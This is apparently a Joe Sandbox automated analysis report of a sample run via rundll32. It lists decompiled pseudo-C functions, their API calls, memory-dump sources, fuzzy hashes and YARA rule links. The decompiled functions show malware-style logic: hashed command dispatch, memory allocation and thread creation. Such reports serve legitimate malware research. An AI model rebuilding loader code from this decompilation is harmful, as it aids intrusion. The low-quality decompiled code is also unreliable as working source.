Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$AllocFreelstrcmpilstrlen
String ID:
API String ID: 727816722-0
Opcode ID: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
Instruction ID: d0415e672ad6f4a9c89e0efb1880c6926a1671767ff9eca089c1e6ebc0bc87c8
Opcode Fuzzy Hash: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
Instruction Fuzzy Hash: 7B216D36600B8896D751DB16E84039AB3A1F78CBD8F48C122FE4D83758DF38CA4ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006D04 Relevance: 3.8, APIs: 3, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00000001180006D04(long long __rbx, void* __rcx, long long __rsi, long long __r9) {
				intOrPtr _t30;
				intOrPtr _t35;
				long long* _t40;
				int _t49;
				long long _t53;
				long long* _t56;
				void* _t57;
				long long _t59;
				void* _t61;
				void* _t64;

				_t59 = __r9;
				_t40 = _t56;
				 *((long long*)(_t40 + 8)) = __rbx;
				 *((long long*)(_t40 + 0x10)) = _t53;
				 *((long long*)(_t40 + 0x18)) = __rsi;
				_t57 = _t56 - 0x50;
				_t4 = _t49 + 0x10; // 0x10
				_t35 = _t4;
				 *((char*)(_t40 - 0x38)) = 8;
				_t30 =  <  ? r8d : _t35;
				 *((char*)(_t40 - 0x37)) = 2;
				 *((intOrPtr*)(_t40 - 0x34)) = 0x660e;
				r8d = _t30;
				 *((short*)(_t40 - 0x36)) = 0;
				 *((intOrPtr*)(_t40 - 0x30)) = _t35;
				memcpy(_t64, _t61, _t49);
				r11d = _t35;
				r11d = r11d - _t30;
				if (r8d == _t35) goto 0x80006d73;
				r8d = r11d;
				memset(??, ??, ??);
				E0000000118000459C(0x9ae4c678, _t40,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t40 == _t49) goto 0x80006da2;
				r9d = 0;
				_t15 = _t59 + 0x1c; // 0x1c
				r8d = _t15;
				 *((long long*)(_t57 + 0x28)) = __r9;
				 *((intOrPtr*)(_t57 + 0x20)) = 0;
				 *_t40(); // executed
				goto 0x80006da4;
				if (0 != 0) goto 0x80006db0;
				return GetLastError();
			}

0x180006d04
0x180006d04
0x180006d07
0x180006d0b
0x180006d0f
0x180006d18
0x180006d28
0x180006d28
0x180006d37
0x180006d3b
0x180006d3f
0x180006d43
0x180006d4a
0x180006d4d
0x180006d51
0x180006d54
0x180006d59
0x180006d5c
0x180006d5f
0x180006d64
0x180006d6e
0x180006d7c
0x180006d84
0x180006d86
0x180006d91
0x180006d91
0x180006d95
0x180006d9a
0x180006d9e
0x180006da0
0x180006da6
0x180006dcb

APIs

memcpy.NTDLL(00000001800099DB), ref: 0000000180006D54
memset.NTDLL(00000001800099DB), ref: 0000000180006D6E
GetLastError.KERNEL32(00000001800099DB), ref: 0000000180006DA8

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorLastmemcpymemset
String ID:
API String ID: 954129129-0
Opcode ID: 95295f05be87c7c3f4886005b4998b098cb939ad94dc0b7d7ecc8385bb3953ea
Instruction ID: b24fa6da6f7637d02e6406ae7bebfb633d62473b8d0dea1419b0e5df7442ba24
Opcode Fuzzy Hash: 95295f05be87c7c3f4886005b4998b098cb939ad94dc0b7d7ecc8385bb3953ea
Instruction Fuzzy Hash: FA21DE3772065486E7A2CB26D844B8E76A1F3CCBC0F198112EE5813B10CF74CA49CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000001C716163EDC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

R, xrefs: 000001C716164064

Memory Dump Source

Source File: 00000004.00000002.765086597.000001C716160000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C716160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c716160000_rundll32.jbxd

Similarity

API ID:
String ID: R
API String ID: 0-1466425173
Opcode ID: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
Instruction ID: 49ed8b641a12185792c5d279536283b7030c42c9ce900dafc3580a1a79d81520
Opcode Fuzzy Hash: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
Instruction Fuzzy Hash: 848146391DDE548FF6A4DB28C454FE976E2FB943A0F9C9458A08AC32D1C6E1DC45AF02

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE35481812 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 100
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00007FFE7FFE35481812(void* __eax, void* __edi, void* __esi, void* __esp, long long _a32, short _a62, short _a64, short _a66, short _a68, short _a70, short _a72, short _a74, short _a76, short _a78, short _a80, void* _a96, void* _a128, void* _a180, long long _a208) {
				short _t21;
				void* _t41;

				_t21 = __eax + 0x5c;
				_a66 = _t21;
				goto 0x3548185c;
				_a72 = _t21;
				_a62 = 0x65;
				goto 0x3548183c;
				_a70 = 0x9b;
				goto 0x35481872;
				goto 0x35481846;
				_a64 = 0x38;
				goto E00007FFE7FFE35481812;
				_a74 = 0x45;
				goto 0x354818b5;
				goto 0x35481866;
				_a68 = 0x6f;
				goto 0x35481832;
				goto 0x3548181c;
				goto 0x354818a9;
				_a80 = 0;
				goto 0x3548187c;
				_a78 = 0x21;
				goto 0x35481889; // executed
				VirtualAlloc(??, ??, ??, ??); // executed
				_a32 = _a208;
				goto 0x354818da;
				r9d = 0x32;
				r9d = r9d + 0xe;
				goto 0x354818cb;
				goto 0x354818bf;
				_a76 = 0x74;
				goto 0x35481892;
				r8d = 0xf55;
				r8d = r8d + 0xab;
				goto 0x354818e8;
				r8d =  *((intOrPtr*)(_a208 + 8));
				goto 0x35481931;
				goto 0x3548189c;
				goto 0x35481924;
				_t41 = memcpy(__edi, __esi, 0);
				goto 0x354818ee;
				goto 0x354818fd;
				goto 0x35481908;
				return _t41;
			}

0x7ffe35481812
0x7ffe35481815
0x7ffe3548181a
0x7ffe3548181c
0x7ffe3548182b
0x7ffe35481830
0x7ffe35481835
0x7ffe3548183a
0x7ffe35481844
0x7ffe35481846
0x7ffe35481850
0x7ffe35481855
0x7ffe3548185a
0x7ffe35481864
0x7ffe35481866
0x7ffe35481870
0x7ffe3548187a
0x7ffe35481887
0x7ffe3548188b
0x7ffe35481890
0x7ffe35481895
0x7ffe3548189a
0x7ffe3548189c
0x7ffe354818a2
0x7ffe354818a7
0x7ffe354818a9
0x7ffe354818af
0x7ffe354818b3
0x7ffe354818bd
0x7ffe354818bf
0x7ffe354818c9
0x7ffe354818cb
0x7ffe354818d1
0x7ffe354818d8
0x7ffe354818e2
0x7ffe354818e6
0x7ffe354818ec
0x7ffe354818fb
0x7ffe354818fd
0x7ffe35481906
0x7ffe35481910
0x7ffe3548191d
0x7ffe3548191f

APIs

VirtualAlloc.KERNELBASE ref: 00007FFE3548189C

Strings

~, xrefs: 00007FFE35481947

Memory Dump Source

Source File: 00000004.00000002.765331866.00007FFE35481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFE35480000, based on PE: true

Associated: 00000004.00000002.765324849.00007FFE35480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.765340158.00007FFE35482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.765346850.00007FFE35483000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.765488940.00007FFE35505000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe35480000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: ~
API String ID: 4275171209-1707062198
Opcode ID: 23c9a529b91b64a43622319348fc625be395018795599c90a3d137ab767d5f4f
Instruction ID: ca8365100222f8a855a59a91800f236ba35f7429f6d9e0b3eb3a4a8416791715
Opcode Fuzzy Hash: 23c9a529b91b64a43622319348fc625be395018795599c90a3d137ab767d5f4f
Instruction Fuzzy Hash: 8041EC76E0C6C3C2E2388B45E40937D6A21EB91F40F626037D69F47BA4DE2EE505B701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001110 Relevance: 3.0, APIs: 2, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

CreateThread.KERNELBASE ref: 000000018000115A
GetLastError.KERNEL32 ref: 0000000180001166

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorLast$CreateThread
String ID:
API String ID: 665435222-0
Opcode ID: 33611ef75179cc0a7cf688456195da8b73a4d3b065f91bba2ce119b7dda03dec
Instruction ID: a627022cb49e9541912d6ea488725a36f99cb9846cfda91d0a227d10bba4b38c
Opcode Fuzzy Hash: 33611ef75179cc0a7cf688456195da8b73a4d3b065f91bba2ce119b7dda03dec
Instruction Fuzzy Hash: 02017C31204748C7E7A1CF62A84039A7360F38CBE4F148625AB9D43B94CF38D6698704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE354810B7 Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

ReadConsoleA.KERNEL32 ref: 00007FFE354810B7
ReadConsoleOutputA.KERNELBASE ref: 00007FFE354810FB

Memory Dump Source

Source File: 00000004.00000002.765331866.00007FFE35481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFE35480000, based on PE: true

Associated: 00000004.00000002.765324849.00007FFE35480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.765340158.00007FFE35482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.765346850.00007FFE35483000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.765488940.00007FFE35505000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe35480000_rundll32.jbxd

Similarity

API ID: ConsoleRead$Output
String ID:
API String ID: 998487036-0
Opcode ID: c3a25d08347ce4988534e0ec1b19da2b181a03e4656b16271a26a59e5cd27ae5
Instruction ID: c987be35f19e21a184c81e885f5410d48f5c8bd307c252436ad5ca497bcf69ac
Opcode Fuzzy Hash: c3a25d08347ce4988534e0ec1b19da2b181a03e4656b16271a26a59e5cd27ae5
Instruction Fuzzy Hash: DFF0F431E1C7C3C5E6BC8B11944867E6A61BB85F84F615036D98F92BA8DE1EF404BB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800025EC Relevance: 3.0, APIs: 2, Instructions: 14synchronizationCOMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 00000001800025F7
WaitForSingleObject.KERNEL32 ref: 0000000180002615

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: ObjectSingleSleepWait
String ID:
API String ID: 309074506-0
Opcode ID: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
Instruction ID: 868bbf46d8f10ff22f1b5017158e4687c10dd0102503e43f41494b1e161a0d2d
Opcode Fuzzy Hash: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
Instruction Fuzzy Hash: 6BD05B3470360442FD9ED711985036532205F8CBD9F54C614A52B472D0CE29969E4700

Uniqueness

Uniqueness Score: -1.00%

Function 000001C716163880 Relevance: 1.7, APIs: 1, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 000001C716163A5F

Memory Dump Source

Source File: 00000004.00000002.765086597.000001C716160000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C716160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c716160000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
Instruction ID: c2a3b9d9c638d3788557511484fb369ec7c2f48c66af191bee091bdd92c006fa
Opcode Fuzzy Hash: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
Instruction Fuzzy Hash: EB510E3859CA549FF6A4DB188054BEA76E1FB843A4F98291DA086C32E0D7F4C841BF02

Uniqueness

Uniqueness Score: -1.00%

Function 000001C716161C0B Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.765086597.000001C716160000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C716160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c716160000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
Instruction ID: ef1dfdee95a0e627c92e09ab980c9c0c67d73980581eb024b0230038516ec59a
Opcode Fuzzy Hash: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
Instruction Fuzzy Hash: E6511F3959CE488FF6A4DB1C805AFED76E1FB843A2F9C4519A447C32D1D6E4D840AF42

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0000000180008D78 Relevance: 24.2, APIs: 16, Instructions: 249
memorystringtimeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E00000001180008D78(void* __eflags, long long __rbx, intOrPtr* __rcx, long long __rdx) {
				void* _t77;
				void* _t88;
				intOrPtr _t91;
				void* _t96;
				char _t97;
				void* _t115;
				long long* _t157;
				void* _t158;
				long long _t160;
				char* _t162;
				long long _t163;
				char* _t178;
				char* _t179;
				void* _t203;
				long long _t204;
				void* _t208;
				intOrPtr* _t209;
				int _t211;
				void* _t215;
				void* _t216;
				void* _t235;
				long _t238;
				long _t244;
				void* _t246;
				CHAR* _t253;
				long long _t254;

				_t235 = _t215;
				 *((long long*)(_t235 + 8)) = __rbx;
				 *((long long*)(_t235 + 0x10)) = __rdx;
				_t216 = _t215 - 0x40;
				r13d =  *0x8000d498;
				_t209 = __rcx;
				 *((long long*)(_t216 + 0x38)) =  *((intOrPtr*)( *0x8000d4a0 + 8));
				if (E00000001180002370(r13d ^ 0x55e7ce26,  *((intOrPtr*)( *0x8000d4a0 + 8)), __rdx, _t235) != 0) goto 0x800090ee;
				_t204 =  *((intOrPtr*)( *0x8000d4a0 + 8));
				_t157 =  *_t209;
				 *((long long*)(_t216 + 0x98)) = _t157;
				 *((long long*)(_t216 + 0x28)) = _t204;
				if ( *((intOrPtr*)(_t216 + 0x20)) == 0) goto 0x80008f65;
				r8d = lstrlenA(_t253) + 1;
				HeapAlloc(_t246, _t244, _t238);
				_t254 = _t157;
				if (_t157 == 0) goto 0x800090e4;
				memcpy(_t203, _t208, _t211);
				_t162 = _t254;
				if ( *_t162 == 0x20) goto 0x80008e46;
				if ( *_t162 != 9) goto 0x80008e4b;
				_t163 = _t162 + 1;
				goto 0x80008e3c;
				if ( *_t163 == 0) goto 0x80008ecc;
				lstrlenA(??);
				asm("cdq");
				_t12 = _t157 + 1; // 0x1
				r8d = _t12;
				HeapAlloc(??, ??, ??);
				if (_t157 == 0) goto 0x80008ece;
				_t96 =  *_t163;
				if (_t96 == 0) goto 0x80008e99;
				if (_t96 == 0x20) goto 0x80008e95;
				_t178 = _t163 + 1;
				_t97 =  *_t178;
				if (_t97 != 0) goto 0x80008e87;
				if (_t97 != 0) goto 0x80008e9b;
				if (_t178 == 0) goto 0x80008eb5;
				 *_t178 = 0;
				_t179 = _t178 + 1;
				if ( *_t179 == 0x20) goto 0x80008eb0;
				if ( *_t179 != 9) goto 0x80008eb5;
				goto 0x80008ea6;
				 *_t157 = _t163;
				_t158 = _t157 + _t204;
				if (_t179 + 1 != 0) goto 0x80008e7e;
				goto 0x80008ed6;
				if (0 == 0) goto 0x80008f4f;
				E0000000118000958C( *((intOrPtr*)(_t216 + 0x98)) + 0x18);
				 *((long long*)(_t209 + 0x40)) = _t254;
				 *((long long*)(_t209 + 0x48)) =  *((intOrPtr*)(_t216 + 0x90));
				 *((intOrPtr*)(_t209 + 0x50)) = bpl;
				if ( *((char*)(_t209 + 0x70)) == 0) goto 0x80008f09;
				 *((char*)(_t209 + 0x70)) = 0;
				asm("lock and dword [esi+0x2c], 0xfffffffe");
				LeaveCriticalSection(??);
				if ( *((intOrPtr*)(_t209 + 0x40)) == 0) goto 0x80008f3e;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				goto 0x80008f6a;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				if (0x57 != 0) goto 0x800090f3;
				if (E00000001180002370(r13d ^ 0x881e33f6, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090ee;
				_t77 = E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98);
				_t91 =  *((intOrPtr*)(_t216 + 0x98));
				if (_t77 != 0) goto 0x80008fd2;
				if (_t91 == 0) goto 0x800090ee;
				 *((intOrPtr*)(_t209 + 0x28)) = _t91;
				if (E00000001180002370(r13d ^ 0xa2dd2342, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x8000905e;
				_t39 = _t158 + 0x10; // 0x10
				_t88 = _t39;
				_t115 =  <  ?  *((void*)(_t216 + 0x90)) : _t88;
				E0000000118000958C( *_t209 + 0x18);
				r8d = _t115;
				memcpy(??, ??, ??);
				if (_t115 - _t88 >= 0) goto 0x80009043;
				r8d = _t88 - _t115;
				memset(??, ??, ??);
				LeaveCriticalSection(??);
				HeapFree(??, ??, ??);
				r13d = r13d ^ 0x1a1a0866;
				if (E00000001180002370(r13d, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090f3;
				if (E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98) == 0) goto 0x800090f3;
				if ( *((intOrPtr*)(_t216 + 0x98)) == 0) goto 0x800090f3;
				_t55 =  *_t209 + 0x18; // 0x28
				E0000000118000958C(_t55);
				GetSystemTimeAsFileTime(??);
				_t160 =  *((intOrPtr*)(_t216 + 0x30)) + ( *((intOrPtr*)( *0x8000d4a0 + 8)) +  *((intOrPtr*)( *0x8000d4a0 + 8))) * 0x23c34600;
				 *((long long*)(_t216 + 0x30)) = _t160;
				 *((long long*)(_t209 + 0x30)) = _t160;
				LeaveCriticalSection(??);
				goto 0x800090f3;
				goto 0x80008f6a;
				return 1;
			}

APIs

lstrlenA.KERNEL32(?,?,?,?,000000B0,00000008,?,0000000180002348), ref: 0000000180008DFC
HeapAlloc.KERNEL32 ref: 0000000180008E0E
memcpy.NTDLL ref: 0000000180008E29
lstrlenA.KERNEL32 ref: 0000000180008E53
HeapAlloc.KERNEL32 ref: 0000000180008E6B
LeaveCriticalSection.KERNEL32 ref: 0000000180008F12
HeapFree.KERNEL32 ref: 0000000180008F2A
HeapFree.KERNEL32 ref: 0000000180008F38
HeapFree.KERNEL32 ref: 0000000180008F57
HeapFree.KERNEL32(?,?,?,?,000000B0,00000008,?,0000000180002348), ref: 0000000180008F77
memcpy.NTDLL ref: 0000000180009026
memset.NTDLL ref: 000000018000903E
LeaveCriticalSection.KERNEL32 ref: 0000000180009048
HeapFree.KERNEL32 ref: 0000000180009058
GetSystemTimeAsFileTime.KERNEL32 ref: 00000001800090B7
LeaveCriticalSection.KERNEL32 ref: 00000001800090DC

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$CriticalLeaveSection$AllocTimelstrlenmemcpy$FileSystemmemset
String ID:
API String ID: 3273538229-0
Opcode ID: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
Instruction ID: 6b8e83564c84abddb59c8c95e9bb71b7576c070b9c7c9cfbfdeb8062ede7394d
Opcode Fuzzy Hash: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
Instruction Fuzzy Hash: 65A18032204A8986EBA6DF66E4543DA7791FB8DBC4F48C015EA8D47755DF38C64EC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005748 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184
memorysynchronizationCOMMONCrypto

Download Yara Rule

C-Code - Quality: 53%

			E00000001180005748(void* __ecx, signed int __edx, signed long long __rbx, void* __rcx, void* __rdx, void* __r8) {
				void* __rdi;
				void* __rsi;
				signed int _t35;
				void* _t69;
				void* _t80;
				char* _t113;
				signed long long _t116;
				char* _t124;
				void* _t142;
				void* _t145;
				char* _t147;
				signed long long _t150;
				void* _t152;
				void* _t153;
				long _t169;
				void* _t170;
				void* _t172;
				void* _t175;

				_t116 = __rbx;
				 *((long long*)(_t152 + 8)) = __rbx;
				 *(_t152 + 0x18) = _t150;
				_t153 = _t152 - 0x40;
				_t113 =  *0x8000d4a0;
				r15d =  *0x8000d498;
				_t35 = r15d ^ __edx;
				_t146 = __r8;
				_t170 = __rcx;
				_t4 = _t150 + 1; // 0x1
				_t80 = _t4;
				if (_t35 == 0x139d2b8d) goto 0x8000588d;
				if (_t35 == 0x15f5a8c2) goto 0x80005865;
				if (_t35 == 0x2f77acf9) goto 0x8000588b;
				if (_t35 == 0x31f2972e) goto 0x80005861;
				if (_t35 == 0x48e12436) goto 0x80005965;
				if (_t35 == 0x4d382929) goto 0x80005905;
				if (_t35 == 0x7f513d6b) goto 0x80005863;
				if (_t35 == 0xb016dc39) goto 0x80005852;
				if (_t35 == 0xb057dfc9) goto 0x800057e4;
				goto 0x800059bb;
				if (r9d == 0) goto 0x80005848;
				E000000011800024CC(r9d, __rbx, __r8, __r8, _t175);
				if (_t113 == 0) goto 0x8000583e;
				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t116;
				if (E00000001180002668(_t113, _t116, _t170, 0x180001844, _t146, _t150, _t113,  *((intOrPtr*)(_t153 + 0x90))) != 0) goto 0x8000582b;
				goto 0x800059bb;
				HeapFree(_t172, _t169, _t142);
				goto 0x800059bb;
				goto 0x800059bb;
				goto 0x800059bb;
				SetEvent(_t145);
				goto 0x800059bb;
				if (r9d == 0) goto 0x80005848;
				_t124 = _t113;
				E000000011800024CC(r9d, _t116, _t124, _t146);
				_t147 = _t113;
				if (_t113 == 0) goto 0x8000583e;
				if (_t80 + _t80 != 2) goto 0x800058ae;
				goto 0x800058c2;
				if ( *((intOrPtr*)(_t124 + 0x50)) == 0) goto 0x800058ec;
				WaitForSingleObject(??, ??);
				asm("sbb ebx, ebx");
				goto 0x800058f1;
				_t139 =  ==  ? 0x18000543c : 0x180001b7c;
				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t150;
				if (E00000001180002668(0x18000543c, _t116, _t170,  ==  ? 0x18000543c : 0x180001b7c, _t147, _t150, _t147,  *((intOrPtr*)(_t153 + 0x90))) == 0) goto 0x80005821;
				goto 0x8000582e;
				if (_t80 == 0) goto 0x800059bb;
				if (0x426 != 0x426) goto 0x800059bb;
				if (_t147 == 0) goto 0x8000595f;
				if ( *_t147 == 0) goto 0x8000595f;
				memset(??, ??, ??);
				if (E000000011800020DC(0x18000543c, _t116, _t147, _t153 + 0x30, _t147) != 0) goto 0x8000595d;
				if (E000000011800038F8(_t147, _t153 + 0x30, _t153 + 0x78) == 0) goto 0x8000595f;
				asm("ror ax, 0x8");
				 *((short*)(_t153 + 0x32)) =  *(_t153 + 0x78) & 0x0000ffff;
				if (0 != 0) goto 0x800059bb;
				if ( *(_t170 + 0x50) == 0) goto 0x8000599a;
				 *(_t170 + 0x50) =  *(_t170 + 0x50) & 0x00000000;
				E00000001180007950(0,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *(_t170 + 0x50), _t113,  *(_t170 + 0x50), _t150);
				HeapFree(??, ??, ??);
				goto 0x8000599f;
				if (_t80 == 0) goto 0x800059bb;
				_t69 = E00000001180001A88( *((intOrPtr*)( *0x8000d4a0 + 8)), _t153 + 0x30, _t113,  *(_t170 + 0x50), _t150,  *((intOrPtr*)(_t170 + 0x38)), _t170 + 0x50);
				if ( *((long long*)(_t153 + 0x90)) == 0) goto 0x800059e1;
				if (_t69 == 0x3e5) goto 0x800059e1;
				r8d = _t69;
				E00000001180005600( *((intOrPtr*)( *0x8000d4a0 + 8)), _t170,  *((intOrPtr*)(_t153 + 0x90)), _t150);
				return _t69;
			}

APIs

HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005833
SetEvent.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005856
WaitForSingleObject.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000589C
memset.NTDLL(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005926
HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005990

Strings

lJu, xrefs: 0000000180005914
6$H, xrefs: 00000001800057AE
))8M, xrefs: 00000001800057B9

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: FreeHeap$EventObjectSingleWaitmemset
String ID: ))8M$6$H$lJu
API String ID: 2222956709-2816507560
Opcode ID: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
Instruction ID: 785fb66ca69b8b0f02f3e946b07437a251f863b49ae3d9a65a40210c3f307c76
Opcode Fuzzy Hash: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
Instruction Fuzzy Hash: 9A61B231205B4D86FBE7DA56A4843EB3291A74DBD2F54C026FE895B7D5DE28CA4EC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003A24 Relevance: 10.6, APIs: 7, Instructions: 137
synchronizationthreadCOMMONCrypto

Download Yara Rule

C-Code - Quality: 28%

			E00000001180003A24(long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
				void* __rdi;
				long _t49;
				void* _t54;
				void* _t72;
				signed long long _t94;
				signed long long _t95;
				long long* _t97;
				int _t112;
				void* _t113;
				signed long long _t118;
				void* _t120;
				long long* _t126;
				void* _t128;
				signed long long _t129;
				void* _t131;

				 *((long long*)(_t120 + 8)) = __rbx;
				 *(_t120 + 0x10) = _t118;
				 *((long long*)(_t120 + 0x18)) = __rsi;
				_t116 =  *0x8000d4a0;
				_t113 = __r9;
				_t97 = __rcx;
				if (__r9 != 0) goto 0x80003a5b;
				goto 0x80003be2;
				r8d = 0x10;
				memcpy(_t131, _t128, _t112);
				InitializeCriticalSection(??);
				_t6 = _t97 + 0x88; // 0x88
				_t126 = _t6;
				 *((long long*)(__rcx + 0xa0)) = 0x180002f24;
				_t129 = _t128 | 0xffffffff;
				 *((long long*)(__rcx + 0xa8)) = E00000001180007A7C;
				r13d = _t129 + 2;
				r9d = 0;
				r8d = 0;
				 *((long long*)(__rcx + 0x98)) = E00000001180008368;
				 *((long long*)(__rcx + 0x90)) = _t126;
				 *_t126 = _t126;
				 *(__rcx + 0x10) = _t129;
				CreateEventA(??, ??, ??, ??);
				 *((long long*)(__rcx + 0x20)) = E00000001180008368;
				if (E00000001180008368 == 0) goto 0x80003bd6;
				r9d = 0;
				r8d = 0;
				CreateEventA(??, ??, ??, ??);
